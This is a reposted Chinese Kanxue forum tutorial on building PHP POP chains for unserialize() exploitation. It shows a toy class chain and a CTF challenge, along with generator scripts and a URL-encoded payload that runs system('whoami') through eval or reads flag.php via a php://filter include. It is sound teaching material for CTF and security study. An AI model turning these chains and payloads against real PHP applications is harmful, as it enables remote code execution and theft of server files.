POP链构造学习心得
![](https://imgs.knowsafe.com:8087/img/imgsaideep/0xu/2021/1/20/33f1809efeed0f0920ba2ba3e893566e.jpg)
本文为看雪论坛优秀文章
看雪论坛作者ID:H3h3QAQ
POP链基础
一
POP和POP链的定义
1、什么是POP
2、POP链原理
二
POP链构造初探
1、简单的POP链构造三部曲
show_source(__FILE__);
class Lemon {
protected $a;
function __construct() {
$this->a = new H3();
}
function __destruct() {
$this->a->action();
}
}
class H3 {
function action() {
echo "I want to play basketball!";
}
}
class Hack {
private $data;
function H3() {
eval($this->data);
}
}
unserialize($_GET['eval']);
__destruct()://析构函数当对象被销毁时会被自动调用
__wakeup(): //unserialize()时会被自动调用
__invoke(): //当尝试以调用函数的方法调用一个对象时,会被自动调用
__call(): //在对象上下文中调用不可访问的方法时触发
__callStatci(): //在静态上下文中调用不可访问的方法时触发
__get(): //用于从不可访问的属性读取数据
__set(): //用于将数据写入不可访问的属性
__isset(): //在不可访问的属性上调用isset()或empty()触发
__unset(): //在不可访问的属性上使用unset()时触发
__toString(): //把类当作字符串使用时触发
__construct(): //构造函数,当对象new的时候会自动调用,但在unserialize()时不会自动调用
__sleep(): //serialize()函数会检查类中是否存在一个魔术方法__sleep() 如果存在,该方法会被优先调用
class Lemon {
protected $a;
function __construct() {
$this->a = new H3();
}
function __destruct() {
$this->a->action();
}
}
class Hack {
private $data;
function action() {
eval($this->data);
}
}
class Lemon {
protected $a;
function __construct() {
$this->a = new Hack();
}
}
class Hack {
private $data="system('whoami');";
}
$a=new Lemon();
echo urlencode(serialize($a));
O%3A5%3A%22Lemon%22%3A1%3A%7Bs%3A4%3A%22%00%2A%00a%22%3BO%3A4%3A%22Hack%22%3A1%3A%7Bs%3A10%3A%22%00Hack%00data%22%3Bs%3A17%3A%22system%28%27whoami%27%29%3B%22%3B%7D%7D
![](https://imgs.knowsafe.com:8087/img/chayuqing/2023/1/8/d7a4c6ca0f18f16690091b2b721a0c81.png)
2、CTF题目中的POP链构造
class Modifier {
protected $var;
public function append($value){
include($value);
}
public function __invoke(){ //当脚本尝试将对象调用为函数时触发
$this->append($this->var);
}
}
class Show{
public $source;
public $str;
public function __construct($file='index.php'){ // 当一个对象创建时被调用
$this->source = $file;
echo 'Welcome to '.$this->source."<br>";
}
public function __toString(){ //当一个对象被当作一个字符串被调用
return $this->str->source;
}
public function __wakeup(){ //使用unserialize时触发
if(preg_match("/gopher|http|file|ftp|https|dict|\.\./i", $this->source)) {
echo "hacker";
$this->source = "index.php";
}
}
}
class Test{
public $p;
public function __construct(){ // 当一个对象创建时被调用
$this->p = array();
}
public function __get($key){ //用于从不可访问的属性读取数据
$function = $this->p;
return $function();
}
}
if(isset($_GET['pop'])){
@unserialize($_GET['pop']);
}
else{
$a=new Show;
highlight_file(__FILE__);
}
class Modifier {
protected $var;
public function append($value){
include($value);
}
public function __invoke(){ //当脚本尝试将对象调用为函数时触发
$this->append($this->var);
}
}
class Show{
public $source;
public $str;
public function __construct($file='index.php'){ // 当一个对象创建时被调用
$this->source = $file;
echo 'Welcome to '.$this->source."<br>";
}
public function __toString(){ //当一个对象被当作一个字符串被调用
return $this->str->source;
}
public function __wakeup(){ //使用unserialize时触发
if(preg_match("/gopher|http|file|ftp|https|dict|\.\./i", $this->source)) {
echo "hacker";
$this->source = "index.php";
}
}
}
public function __wakeup(){ //使用unserialize时触发
if(preg_match("/gopher|http|file|ftp|https|dict|\.\./i", $this->source)) {
echo "hacker";
$this->source = "index.php";
}
}
public function __toString(){ //当一个对象被当作一个字符串被调用
return $this->str->source;
}
public function __get($key){ //用于从不可访问的属性读取数据
$function = $this->p;
return $function();
}
class Modifier {
protected $var;
public function append($value){
include($value);
}
public function __invoke(){ //当脚本尝试将对象调用为函数时触发
$this->append($this->var);
}
}
class Modifier {
protected $var = "php://filter/convert.base64-encode/resource=flag.php";
}
class Show{
public $source;
public $str;
public function __construct($file){
$this->source = $file;
}
public function __toString(){
return "H3";
}
}
class Test{
public $p;
public function __construct(){
$this->p = new Modifier();
}
}
$a = new Show(' ');
$a->str= new Test();
$h3 = new Show($a);
echo urlencode(serialize($h3));
![](https://imgs.knowsafe.com:8087/img/chayuqing/2023/1/8/0027c21f837ddfd4205a1122d1218599.png)
![](https://imgs.knowsafe.com:8087/img/chayuqing/2023/1/8/d32834c1e019cb7221d62f889e3e1a26.png)
3、真实环境下的POP链构造
三
总结
看雪ID:H3h3QAQ
https://bbs.kanxue.com/user-home-921448.htm
![](https://imgs.knowsafe.com:8087/img/chayuqing/2023/1/8/5c7cf5c0b7af0230fe01b5ea0848cdd7.jpg)
# 往期推荐
![](https://imgs.knowsafe.com:8087/img/chayuqing/2023/1/8/4b8da33494e411e456d62c3824cf2b69.jpg)
![](https://imgs.knowsafe.com:8087/img/chayuqing/2023/1/8/d7ac659d833cf21af1239b8352db4234.gif)
球分享
![](https://imgs.knowsafe.com:8087/img/chayuqing/2023/1/8/d7ac659d833cf21af1239b8352db4234.gif)
球点赞
![](https://imgs.knowsafe.com:8087/img/chayuqing/2023/1/8/d7ac659d833cf21af1239b8352db4234.gif)
球在看
![](https://imgs.knowsafe.com:8087/img/chayuqing/2023/1/8/acbd2417f9c7a98a99dbd7dd06376440.gif)
点击“阅读原文”,了解更多!
[广告]赞助链接:
关注数据与安全,洞悉企业级服务市场:https://www.ijiandao.com/
让资讯触达的更精准有趣:https://www.0xu.cn/
![公众号](/static/sslhub/img/ewm.jpg)
随时掌握互联网精彩
- 3 分钟看完 NVIDIA GPU 架构及演进
- Windows 开发不完全指南:程序开发与逆向分析相辅相成
- 教师节 | 看见 微光
- 中秋活动 | 秋天的第一波福利来啦!
- 【附PPT下载】干货满满!平安SRC线上沙龙第二期圆满落幕!
- 眼力大比拼,大家一起挑战找骁龙!
- 数字时代谁保安全?2022网安强中强直播大赛启动报名
- 在Z|虎牙高薪诚招蓝军对抗、运营管理、安全开发等方向安全工程师
- 小米MIX4最新渲染图曝光;苹果首款OLED iPad将于2023年问世;格力将引进鸿蒙操作系统|极客头条
- 深挖 AI 价值与温度,AETA 地震预测 AI 算法大赛开启
- 内核层自己发送IRP请求操作文件全面总结
- WebTrust是什么?WebTrust认证的CA有哪些?
赞助链接